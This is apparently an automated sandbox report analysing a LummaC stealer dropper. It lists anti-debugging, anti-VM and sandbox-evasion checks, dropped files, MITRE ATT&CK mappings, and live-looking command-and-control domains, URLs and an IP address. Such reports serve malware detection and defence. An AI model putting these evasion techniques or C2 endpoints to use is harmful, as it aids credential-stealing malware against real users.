Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 1061A33 second address: 1061A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F11753296B4h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 1061599 second address: 106159D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 106159D second address: 10615B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F11753296A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F11753296A6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 10615B1 second address: 10615B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 105A20C second address: 105A211 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 105A211 second address: 105A25D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F1174CFE2B6h 0x00000009 jmp 00007F1174CFE2C2h 0x0000000e jmp 00007F1174CFE2C6h 0x00000013 popad 0x00000014 jmp 00007F1174CFE2C4h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c push esi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 1059119 second address: 105911D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 1058E3C second address: 1058E52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007F1174CFE2B6h 0x0000000b jnl 00007F1174CFE2B6h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 1058E52 second address: 1058E56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 105A036 second address: 105A06E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F1174CFE2BEh 0x0000000a popad 0x0000000b jne 00007F1174CFE2B8h 0x00000011 pushad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 jmp 00007F1174CFE2C5h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 105A06E second address: 105A074 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 105A074 second address: 105A09E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1174CFE2C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F1174CFE2BBh 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	RDTSC instruction interceptor: First address: 105A09E second address: 105A0BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11753296B9h 0x00000009 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Special instruction interceptor: First address: DBD94A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Special instruction interceptor: First address: F937EE instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Memory allocated: 5620000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Memory allocated: 57A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Memory allocated: 77A0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\YrxiR3yCLm.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\YrxiR3yCLm.exe TID: 1908

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\YrxiR3yCLm.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: YrxiR3yCLm.exe, YrxiR3yCLm.exe, 00000000.00000002.1754778405.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Set-up.exe.0.dr	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: YrxiR3yCLm.exe, 00000000.00000002.1753537825.00000000006E2000.00000040.00000001.01000000.00000003.sdmp, YrxiR3yCLm.exe, 00000000.00000003.1711393413.00000000055B0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: <Module>ladddad.exeProgramStubWriterRunnerRunTimeAntiAntismscorlibSystemObjectdelaydelayTimeantiVMantiSandboxantiDebugantiEmulatorenablePersistenceenableFakeErrorencryptTypecompressedcversSystem.Collections.GenericList`1fileNamesfileTypesfileRunTypesfileDropPathsMainDecompressEncryptOrDecryptXORDecryptEncryptInitalizeIEnumerable`1EncryptOutputSwapGetResourceRunOnStartup.ctorWriteAllBytesExecuteDetectVirtualMachineGetModuleHandleDetectSandboxieCheckRemoteDebuggerPresentDetectDebuggerCheckEmulatordatatextkeysijfileregNameAppPathHidefileBytesfinalPathpathrunTypelpModuleNamehProcessisDebuggerPresentSystem.ReflectionAssemblyTitleAttributeAssemblyDescriptionAttributeAssemblyCompanyAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyTrademarkAttributeAssemblyFileVersionAttributeAssemblyVersionAttributeSystem.Runtime.InteropServicesComVisibleAttributeGuidAttributeSystem.Runtime.CompilerServicesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeladddadEnvironmentExitSystem.ThreadingThreadSleepget_ItemStringop_EqualitySystem.TextEncodingget_UnicodeGetBytesConcatSystem.IOPathCombineget_CountMemoryStreamSystem.IO.CompressionDeflateStreamStreamCompressionModeCopyToIDisposableDisposeToArrayByteSystem.CoreSystem.LinqEnumerable<EncryptInitalize>b__0Func`2CS$<>9__CachedAnonymousMethodDelegate1CompilerGeneratedAttributeRangeSelect<>c__DisplayClass3<EncryptOutput>b__2bAssemblyGetExecutingAssemblySystem.ResourcesResourceManagerGetObjectAppDomainget_CurrentDomainget_FriendlyNameFileExistsGetEntryAssemblyget_Locationop_InequalityCopyFileAttributesGetAttributesSetAttributesMicrosoft.Win32RegistryRegistryKeyLocalMachineget_UTF8GetStringOpenSubKeySetValueCurrentUserException.cctorConvertFromBase64StringAddGetTempPathSystem.DiagnosticsProcessProcessStartInfoget_StartInfoset_FileNameStartSystem.ManagementManagementObjectSearcherManagementObjectCollectionGetManagementObjectEnumeratorGetEnumeratorManagementBaseObjectget_CurrentToStringToLowerToUpperInvariantContainsMoveNextDllImportAttributekernel32.dllIntPtrToInt32GetCurrentProcessget_HandleDateTimeget_Nowget_Ticksiujwdkvbji0.resources
Source: YrxiR3yCLm.exe, 00000000.00000003.1711393413.00000000055B0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmware
Source: Set-up.exe	Binary or memory string: Hyper-V RAW
Source: YrxiR3yCLm.exe, YrxiR3yCLm.exe, 00000000.00000002.1753537825.00000000006E2000.00000040.00000001.01000000.00000003.sdmp, YrxiR3yCLm.exe, 00000000.00000003.1711393413.00000000055B0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: DetectVirtualMachine
Source: Set-up.exe.0.dr	Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\recent_filesprocessesuptime_minutesC:\Windows\System32\VBox.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Set-up.exe, 00000002.00000003.1754303850.00000000015B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFsion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}00000FF1CE}\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}
Source: Set-up.exe, 00000002.00000003.1968903582.00000000014C4000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1970511615.00000000014C5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1968469606.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1968710299.00000000014C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllxxyyxxxxxxxxxxxxyyyyyyxxxxyxxxyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyzzzzzzzzzzzyzyyzzzzzzzzzzzzzzzzzzzzzzzyyzzzzzzzzzzyyzzzzzzyzzyzzzzyzzzzzzzz\|zzzzrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
Source: Set-up.exe, 00000002.00000003.1878391250.00000000014CC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSFl
Source: YrxiR3yCLm.exe, 00000000.00000002.1754778405.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

API call chain: ExitProcess graph end node

graph_1-12221

Source: C:\Users\user\Desktop\YrxiR3yCLm.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\YrxiR3yCLm.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\YrxiR3yCLm.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	File opened: NTICE
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	File opened: SICE
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Code function: 1_2_002FBAD0 LdrInitializeThunk,

1_2_002FBAD0

Source: C:\Users\user\Desktop\YrxiR3yCLm.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: YrxiR3yCLm.exe, 00000000.00000002.1757686227.00000000067A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: bashfulacid.lat
Source: YrxiR3yCLm.exe, 00000000.00000002.1757686227.00000000067A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tentabatte.lat
Source: YrxiR3yCLm.exe, 00000000.00000002.1757686227.00000000067A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: curverpluch.lat
Source: YrxiR3yCLm.exe, 00000000.00000002.1757686227.00000000067A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: talkynicer.lat
Source: YrxiR3yCLm.exe, 00000000.00000002.1757686227.00000000067A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: shapestickyr.lat
Source: YrxiR3yCLm.exe, 00000000.00000002.1757686227.00000000067A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: manyrestro.lat
Source: YrxiR3yCLm.exe, 00000000.00000002.1757686227.00000000067A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: slipperyloo.lat
Source: YrxiR3yCLm.exe, 00000000.00000002.1757686227.00000000067A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: wordyfindy.lat
Source: YrxiR3yCLm.exe, 00000000.00000002.1757686227.00000000067A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: censeractersj.click

Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Process created: C:\Users\user\AppData\Local\Temp\LummaC2.exe "C:\Users\user\AppData\Local\Temp\LummaC2.exe"			Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Process created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"			Jump to behavior

Source: YrxiR3yCLm.exe, YrxiR3yCLm.exe, 00000000.00000002.1754778405.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: m_zProgram Manager

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: YrxiR3yCLm.exe, 00000000.00000003.1717826914.00000000073AF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000002.00000000.1726548663.0000000000BBB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: procmon.exe
Source: YrxiR3yCLm.exe, 00000000.00000003.1717826914.00000000073AF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000002.00000000.1726548663.0000000000BBB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Leaks process information

Source: global traffic

TCP traffic: 192.168.2.4:49733 -> 185.121.15.192:80

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	12 Process Injection	1 Masquerading	OS Credential Dumping	841 Security Software Discovery	Remote Services	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	12 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	261 Virtualization/Sandbox Evasion	Security Account Manager	261 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Clipboard Data	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Process Injection	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	15 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	4 Obfuscated Files or Information	Cached Domain Credentials	214 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
YrxiR3yCLm.exe	34%	Virustotal		Browse
YrxiR3yCLm.exe	58%	ReversingLabs	Win32.Trojan.Amadey
YrxiR3yCLm.exe	100%	Avira	HEUR/AGEN.1313526
YrxiR3yCLm.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\LummaC2.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\LummaC2.exe	37%	ReversingLabs	Win32.Trojan.MintZard
C:\Users\user\AppData\Local\Temp\Set-up.exe	26%	ReversingLabs	Win32.Infostealer.Tinba

Source	Detection	Scanner	Label
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003	0%	Avira URL Cloud	safe
http://home.fortth14ht.top/nTrm	0%	Avira URL Cloud	safe
censeractersj.click	0%	Avira URL Cloud	safe
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13	0%	Avira URL Cloud	safe
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKS	0%	Avira URL Cloud	safe
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
home.fortth14ht.top	185.121.15.192	true	false		high
httpbin.org	3.218.7.103	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003	true	Avira URL Cloud: safe	unknown
wordyfindy.lat	false		high
slipperyloo.lat	false		high
curverpluch.lat	false		high
tentabatte.lat	false		high
bashfulacid.lat	false		high
manyrestro.lat	false		high
censeractersj.click	true	Avira URL Cloud: safe	unknown
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0	true	Avira URL Cloud: safe	unknown
shapestickyr.lat	false		high
https://httpbin.org/ip	false		high
talkynicer.lat	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://curl.se/docs/hsts.html	Set-up.exe.0.dr	false		high
http://html4/loose.dtd	YrxiR3yCLm.exe, 00000000.00000003.1717826914.00000000073AF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000000.1726548663.0000000000BBB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
https://httpbin.org/ipbefore	YrxiR3yCLm.exe, 00000000.00000003.1717826914.00000000073AF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000000.1726548663.0000000000BBB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
https://curl.se/docs/http-cookies.html	YrxiR3yCLm.exe, 00000000.00000003.1717826914.00000000073AF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000000.1726548663.0000000000BBB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13	Set-up.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKS	Set-up.exe, 00000002.00000002.1969788086.0000000000BB9000.00000004.00000001.01000000.00000008.sdmp	false	Avira URL Cloud: safe	unknown
http://home.fortth14ht.top/nTrm	Set-up.exe, Set-up.exe, 00000002.00000003.1968469606.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1968674966.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1970545914.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1968493704.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1968977470.00000000014E0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://curl.se/docs/alt-svc.html	Set-up.exe.0.dr	false		high
http://.css	YrxiR3yCLm.exe, 00000000.00000003.1717826914.00000000073AF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000000.1726548663.0000000000BBB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
http://.jpg	YrxiR3yCLm.exe, 00000000.00000003.1717826914.00000000073AF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000000.1726548663.0000000000BBB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.121.15.192	home.fortth14ht.top	Spain		207046	REDSERVICIOES	false
3.218.7.103	httpbin.org	United States		14618	AMAZON-AESUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581234
Start date and time:	2024-12-27 08:55:40 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	YrxiR3yCLm.exe renamed because original name is a hash value
Original Sample Name:	8e9ea8e0e87ddaecdbb57823ead16033.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@5/3@8/2
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63, 52.149.20.212
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Set-up.exe, PID 2364 because there are no executed function
Execution Graph export aborted for target YrxiR3yCLm.exe, PID 6508 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.121.15.192	Cph7VEeu1r.exe	Get hash	malicious	LummaC	Browse	home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
	3stIhG821a.exe	Get hash	malicious	LummaC	Browse	home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse	home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
	vJPhYDClT5.exe	Get hash	malicious	Unknown	Browse	home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
	jklg6EIhyR.exe	Get hash	malicious	Unknown	Browse	home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
	qr2JeuLuOQ.exe	Get hash	malicious	Unknown	Browse	home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
	E6rBvcWFWu.exe	Get hash	malicious	Unknown	Browse	home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
	gDPzgKHFws.exe	Get hash	malicious	Cryptbot	Browse	home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
	HFoyAy1tg8.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	fivetk5sb.top/v1/upload.php
	8kl5nJ3f9x.exe	Get hash	malicious	Cryptbot	Browse	home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
3.218.7.103	qZA8AyGxiA.exe	Get hash	malicious	Unknown	Browse
	Cph7VEeu1r.exe	Get hash	malicious	LummaC	Browse
	DRWgoZo325.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar	Browse
	xXe4fTmV2h.exe	Get hash	malicious	Unknown	Browse
	lolvgcpX19.exe	Get hash	malicious	Unknown	Browse
	w6cYYyWXqJ.exe	Get hash	malicious	Unknown	Browse
	E6rBvcWFWu.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
httpbin.org	qZA8AyGxiA.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	Cph7VEeu1r.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	3stIhG821a.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
	4o4t8dO4r1.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	xXe4fTmV2h.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	lolvgcpX19.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
